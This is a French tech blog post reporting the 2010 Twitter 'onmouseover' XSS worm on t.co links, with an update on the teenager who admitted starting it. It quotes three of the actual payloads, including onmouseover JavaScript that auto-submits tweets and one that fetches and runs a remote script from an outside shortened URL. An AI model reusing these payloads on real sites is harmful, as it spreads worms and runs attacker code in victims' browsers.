A gagner sur Tux :
Une soirée NRJ avec Bob Sinclar à Lyon / Places de concert pour CARIMI le 28 mai à Paris
Twitter hacké : Faille XSS utilisée
Le site Twitter a été victime d’un détournement dont plusieurs utilisateurs ont pu générer des Rewteets via une faille XSS comme @Matsta, @Matsta, @tbubbaloo et plein d’autres.
Si vous vous rendiez sur votre compte twitter sur le site twitter.com, vous auriez envoyé automatiquement un message (un code) comme ceux-ci :
http://t.co/@ »onmouseover= »document.getElementById(‘status’).value=’RT Matsta’;$(‘.status-update-form’).submit(); »class= »modal-overlay »/
ou celui ci : http://a.no/@ »onmouseover= »;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit() » style= »color:#000;background:#000;/
http://t.co/@ »style= »font-size:999999999999px; »onmouseover= »$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7′) »/
Twitter a donc été victime d’un hack, sans gravité pour les utilsiateurs, juste gênant, à cause d’une faille XSS du système de raccourci d’URL du site (t.co)
Les utilisateurs de client Twitter (Tweetdeck, Hoostsuite…) n’ont pas été concerné par ce bug. Ils ont juste constaté les dégats.
Voici le genre d’erreurs qu’on a pu lire sur le site en se connectant sur sa page twitter :
Un conseil, n’allez plus sur Twitter.com pour poster vos messages ou alors allez y pour vous vous déconnecter (http://twitter.com/logout).
Vous pouvez toujours me suivre (à vos risques et périls :) ) sur Twitter.com/tuxboard.
EDIT 15h20 : la faille a été corrigée.
MAJ 22/09 : Un Australien de 17 ans a admis être l’auteur de cette attaque sur Twitter. Pearce Delphin (@zzap), a reconnu avoir mis au jour une faille dans la sécurité puis avoir entré un code Javascript comme du texte normal dans un message, qui déclenchait l’ouverture de pages web au simple survol de la souris sur le texte.
Mais son idée a été reprise par des hackers qui ont utilisé le code pour rediriger les utilisateurs vers des sites pornographiques ou créer des tweets « vers » qui se répliquaient chaque fois qu’ils étaient lus.
« J’ai fait cela simplement pour voir si le code Javascript pouvait être utilisé dans un tweet (…) Lorsque j’ai posté mon tweet, je n’aurais jamais imaginé que cela allait décoller comme cela. Je n’y avais vraiment pas pensé », a-t-il ajouté.
1 Commentaire
Ce soir c’est au tour de facebook!Enfin c’est peut être pas un hack, juste le site down, apparement ca pourait être une attaque de leur DNS!
Laisser un commentaire
Afin d’assurer la sécurité et la qualité de ce blog, tout commentaire de SPAM, injurieux ou diffamant, susceptible ainsi de faire l'objet d'un délit de presse, (Loi du 29 juillet 1881 sur la liberté de la presse) sera modéré.




Carimi Tour paris 10 places de concert pour le Carimi
10 places à gagner pour le NRJ Extravadance avec Bob Sinclar à Lyon
Toutes les danses de Night-Club
Le lundi, c'est pas ravioli #84
Le Palmarès du Festival de Cannes 2012
Demande en mariage en Lip Dub
McLaren 12C The Perfect Line
Stretching des athlètes américains pour les JO
Résultat Eurovision 2012
Avicii Levels (RebelRebel Disco Remix)
Dernier repas des condamnés à mort
It’s Friday. Fuck this shit #6
Tux’Audio Playlist House mai-juin 2012
Tuxboard en Dalmatie
Les plus belles gares du monde
Edvard Munch Le Cri peinture la plus chère du monde
Photos inédites de New York il y a 100 ans
Tuxboard 1er blogueur des 100 mecs à Adopter